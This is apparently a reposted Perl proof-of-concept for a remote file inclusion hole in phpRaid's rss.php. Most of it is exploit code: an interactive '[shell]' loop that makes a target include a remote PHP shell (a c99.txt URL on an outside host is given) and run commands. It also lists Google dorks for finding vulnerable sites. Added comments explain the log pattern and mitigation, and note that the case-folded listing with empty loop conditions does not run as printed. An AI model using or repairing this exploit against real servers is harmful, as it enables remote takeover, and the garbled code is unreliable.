
phpRaid < 3.0.7 (rss.php phpraid_dir) Remote File Inclusion

  #!/usr/bin/perl
  # phpraid <= 3.x.x (rss.php) remote file inclusion exploit
  # download script : http://up.9q9q.net/up/index.php?f=994a86950
  # founded & coded by: cold z3ro , cold-z3ro@hotmail.com
  # dork : inurl:"phpraid" , "phpraid" , "roster.php?sort=race"
  # perl cold-z3ro.pl
  # cmd shell example:
  # exploit : http://www.example.com/phpraid_path/rss.php?phpraid_dir=evil-script?
  ##
  use lwp::useragent;
  # Top-level driver of the published proof-of-concept, kept exactly as the
  # page shows it. It takes three values (target base URL, URL of a remotely
  # hosted script, name of that script's command parameter), then sends one
  # HTTP GET per entered command and prints the response body.
  #
  # NOTE(review): the listing looks case-folded by the hosting page and both
  # loop conditions below are empty, so this is a record of the technique
  # rather than code that runs as printed (Perl identifiers are case-sensitive).
  #
  # Defender's reading: the only thing sent to the target is a GET for
  #   <base>rss.php?phpraid_dir=<absolute http:// URL>?&<param>=<command>
  # so an rss.php request whose phpraid_dir value is an absolute URL is the
  # pattern to search for in web-server logs. No agent string is set on the
  # client object, so such requests would carry the HTTP library's default
  # User-Agent unless the script is modified.
  # The page title lists phpRaid versions before 3.0.7 as affected; 3.0.7 or
  # later is presumably the fixed release (confirm with the vendor). Keeping
  # PHP's allow_url_include disabled blocks remote includes in general.
  $path = $argv[0];
  $pathtocmd = $argv[1];
  $cmdv = $argv[2];
  # Both URLs must contain "http://" (unanchored match) and the parameter
  # name must be non-empty; otherwise usage() prints the help text and exits.
  if($path!~/http:\/\// || $pathtocmd!~/http:\/\// || !$cmdv){usage()}
  head();
  # Outer loop: one prompt per command. The condition is empty as printed.
  while()
  {
  print "[shell] \$";
  # Inner loop: takes the current value of $_ as the command text. The
  # condition is empty as printed, so nothing visible here assigns $_.
  while()
  {
  $cmd=$_;
  chomp($cmd);
  $xpl = lwp::useragent->new() or die;
  # The URL is built by plain string concatenation; none of the pieces are
  # URL-encoded. rss.php is not shown on this page; the request relies on it
  # using the phpraid_dir parameter as an include path, per the page title.
  $req = http::request->new(get =>$path.'rss.php?phpraid_dir='.$pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\ncould not connect\n";
  $res = $xpl->request($req);
  $return = $res->content;
  # tr/// maps character lists, not regex classes, so the brackets are
  # literal: '[' stays '[', "\n" becomes '.', and ']' also becomes '.'.
  # The purpose is to flatten the body to one line for the /(.*)/ match below.
  $return =~ tr/[\n]/[....]/;
  # The empty-command check runs after the request has already been sent.
  if (!$cmd) {print "\nplease enter a command\n\n"; $return ="";}
  # These patterns look for PHP error text in the response body: a failed
  # remote fetch or an empty command both end the script.
  elsif ($return =~/failed to open stream: http request failed!/ || $return =~/: cannot execute a blank command in /)
  {print "\ncould not connect to cmd host or invalid command variable\n";exit}
  # Matches "fatal error" preceded by one arbitrary character at the start of
  # the body; the '.' between the words also matches any single character.
  elsif ($return =~/^.fatal.error/) {print "\ninvalid command or no return\n\n"}
  # /(.*)/ matches any string, including the empty one, so this branch is
  # always taken and the else branch at the end is unreachable.
  if($return =~ /(.*)/)
  {
  $finreturn = $1;
  # Reverse mapping: every '.' becomes "\n" (the first mapping for a repeated
  # search character wins), so dots present in the original response are
  # turned into newlines as well; '[' and ']' map to themselves.
  $finreturn=~ tr/[....]/[\n]/;
  print "\r\n$finreturn\n\r";
  # Leaves the inner loop; the outer loop then prints the next prompt.
  last;
  }
  else {print "[shell] \$";}}}last;
  sub head()
  {
  print "\n======================long life my home land palestine======================\r\n";
  print "\r\n";
  print "       * phpraid <= 3.x.x (rss.php) remote file inclusion exploit *\r\n";
  print "\r\n";
  print "============================================================================\r\n";
  }
  sub usage()
  {
  head();
  print "\r\n";
  print "  usage: perl cold-z3ro.pl \r\n\n";
  print "  - full path to example: http://www.site.com/phpraid/ \r\n";
  print "  - path to cmd shell e.g  http://b0rizq.by.ru/c99.txt? \r\n";
  print "  - cmd variable used in php shell like [ id ]\r\n";
  print "\r\n";
  print "============================================================================\r\n";
  print "\r\n";
  print "                     found  and  coded  by  cold z3ro \r\n";
  print "                       cold-z3ro[at]hotmail[dot]com \r\n";
  print "          greetz to: www.milw0rm.com , www.hack-teach.com , www.4azhar.com \r\n";
  print "                dork : inurl:phpraid , /roster.php?sort=race\r\n";
  print "\r\n";
  print "============================================================================\r\n";
  exit();
  }
 


    文章作者: 福州军威计算机技术有限公司
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
